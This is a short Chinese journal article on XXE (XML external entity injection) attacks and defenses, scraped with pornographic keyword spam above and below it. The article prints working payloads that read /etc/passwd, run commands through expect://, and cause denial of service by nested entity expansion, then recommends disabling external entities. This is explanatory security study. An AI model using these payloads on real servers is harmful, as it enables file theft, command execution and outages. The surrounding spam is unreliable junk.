亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        XXE漏洞及其防御策略研究

        2018-05-14 02:18:35應(yīng)宗浩金海
        科技風(fēng) 2018年19期
        關(guān)鍵詞:漏洞

        應(yīng)宗浩 金海

        摘要:XXE漏洞是近年來(lái)產(chǎn)生的影響比較大的漏洞之一,能夠任意讀取文件,遠(yuǎn)程執(zhí)行命令,造成拒絕服務(wù)攻擊等。該文通過(guò)xxe漏洞背景介紹,給出相應(yīng)的攻擊手段,并提出防御策略,以期能夠引起人們對(duì)xxe漏洞的重視,并加強(qiáng)相關(guān)方面的安全開發(fā)工作。

        關(guān)鍵詞:XXE;漏洞;攻擊手段;防御策略

        XML是用于標(biāo)記電子文件使其具有結(jié)構(gòu)性的標(biāo)記語(yǔ)言,允許用戶對(duì)自己的標(biāo)記語(yǔ)言進(jìn)行定義。Web端,移動(dòng)端,云端等客戶端技術(shù)使用XML向業(yè)務(wù)應(yīng)用程序發(fā)送消息。為了使應(yīng)用程序使用自定義的XML消息,應(yīng)用程序必須去解析XML文檔并檢查格式是否正確。

        較早的或配置錯(cuò)誤的XML處理器無(wú)法準(zhǔn)確評(píng)估XML文件中的外部實(shí)體引用。攻擊者可以利用外部實(shí)體發(fā)動(dòng)攻擊。此種攻擊行為稱之為XXE(XML Enternal Entity Injection),即XML外部實(shí)體注入攻擊。

        1 XML基礎(chǔ)

        XML文檔結(jié)構(gòu)包括XML聲明、DTD文檔類型定義(可選)、文檔元素。

        以下是一個(gè)典型xml文檔

        <?xml version="1.0"?> <!—xml聲明—>

        <!DOCTYPE note [<!—DTD文檔類型定義,定義此文檔是 note 類型的文檔>

        <!ELEMENT note (head,body)><!定義note元素有四個(gè)元素>

        <!ELEMENT head (#PCDATA)><!定義head元素為”#PCDATA”類型>

        <!ELEMENT body (#PCDATA)><!定義body元素為”#PCDATA”類型>]>

        Reminder<!—文檔元素>

        You are a good man<!—文檔元素>

        DTD(文檔類型定義)的作用是定義 XML 文檔的合法構(gòu)建模塊。DTD 可以在 XML 文檔內(nèi)聲明,也可以外部引用。XXE漏洞關(guān)注的是外部實(shí)體引用,外部實(shí)體引用的代碼如下:

        <!ENTITY 實(shí)體名稱 SYSTEM "URI">

        2 xxe典型攻擊手段

        2.1 任意讀取文件

        <!DOCTYPE foo [<!ENTITY mytest SYSTEMfile:///etc/passwd>]>

        &mytest;

        代碼可以讀取/etc/passwd,file部分可以替換任意文件路徑,使得攻擊者能夠任意讀取文件。

        2.2 執(zhí)行系統(tǒng)命令

        <!DOCTYPEmytest [<!ELEMENT name ANY >

        <!ENTITY mytest SYSTEM "expect://id" >]>

        &mytest;

        該代碼能夠在服務(wù)器上執(zhí)行“id”命令,”id”命令可以替換為其他系統(tǒng)命令,通過(guò)執(zhí)行系統(tǒng)命令.

        2.3 拒絕服務(wù)攻擊

        <!DOCTYPE data [

        <!ENTITY a0 "dos" >

        <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">

        <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">

        <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">

        <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">

        ]>

        &a4;

        該代碼通過(guò)創(chuàng)建一項(xiàng)遞歸的 XML 定義,構(gòu)造惡意的XML實(shí)體文件耗盡可用內(nèi)存,造成拒絕服務(wù)攻擊。

        3 XXE防御策略

        大部分XML解析器無(wú)法正確解析xxe攻擊中的實(shí)體。因此可以配置XML處理器去使用本地靜態(tài)的DTD,不允許XML中含有自聲明的DTD??梢允褂瞄_發(fā)語(yǔ)言提供的禁用外部實(shí)體的方法,從而避免基于XXE漏洞的攻擊。

        另外,升級(jí)libxml版本至2.9.0,libxml 2.9.0 以后默認(rèn)不解析外部實(shí)體,也可以通過(guò)升級(jí)libxml版本進(jìn)行xxe防御。

        參考文獻(xiàn):

        [1]開放式Web應(yīng)用程序安全項(xiàng)目.OWASP Top 10 2017[EB/OL]. http://www.owasp.org.cn/owaspproject/OWASPTop102017v1.3.pdf,20171201.

        [2]Mark4z5. 未知攻焉知防——XXE漏洞攻防[EB/OL]. https://security.tencent.com/index.php/blog/msg/69,20140923.

        [3]丁躍潮,張濤.XML實(shí)用教程[M].北京:北京大學(xué)出版社,2006.

        [4]ChristopherSpth,ChristianMainka,VladislavMladenov.DTD/XXEcheatsheat.webinsecurity.blogspot.de/2016/03/xxecheatsheet.html.20160303.

        作者簡(jiǎn)介:應(yīng)宗浩(1997),男,浙江溫州人,本科在讀,研究方向:信息安全,物聯(lián)網(wǎng)安全。

        猜你喜歡
        漏洞
        漏洞
        網(wǎng)絡(luò)安全漏洞管理與漏洞情報(bào)庫(kù)建設(shè)方案探討及研究
        漏洞在哪里
        基于selenium的SQL注入漏洞檢測(cè)方法
        電子制作(2019年11期)2019-07-04 00:34:40
        Windows 10被曝新零日漏洞涉及3大版本
        偵探推理游戲(二)
        三明:“兩票制”堵住加價(jià)漏洞
        漏洞在哪兒
        Java 反序列化漏洞研究
        高鐵急救應(yīng)補(bǔ)齊三漏洞
        中文字幕 人妻熟女| 国产 在线播放无码不卡| 韩国日本在线观看一区二区| 视频一区中文字幕日韩| 偷拍韩国美女洗澡一区二区三区| 国产精品美女久久久网站三级| 久久国产人妻一区二区| 国产av人人夜夜澡人人爽麻豆| 在线a亚洲视频播放在线观看| 亚洲一区久久久狠婷婷| av影片手机在线观看免费网址| 国产美女高潮流白浆免费视频| 欧洲熟妇色xxxx欧美老妇多毛| 久久亚洲精品ab无码播放| 国产丝袜免费精品一区二区 | 精品国产精品三级在线专区| 欧美私人情侣网站| 国产爽爽视频在线| 精品在线视频免费在线观看视频| 国产精品成人亚洲一区| 日本少妇高潮喷水xxxxxxx| 污污内射在线观看一区二区少妇| 久久99国产乱子伦精品免费| 亚洲区偷拍自拍29p| 日本成人中文字幕亚洲一区| 国产丝袜美腿中文字幕| 成人无码av一区二区| 精品日韩欧美一区二区在线播放| 久热香蕉av在线爽青青| 日本高清二区视频久二区| 国产精品黑丝高跟在线粉嫩 | 国产精品亚韩精品无码a在线| 亚洲国产18成人中文字幕久久久久无码av | 无码国模国产在线观看| 波多野结衣aⅴ在线| 宅男久久精品国产亚洲av麻豆| 亚洲一区二区三区在线视频| 精品无码国产自产拍在线观看| 午夜福利电影| 欧美精品一区二区精品久久| 日韩有码在线免费视频|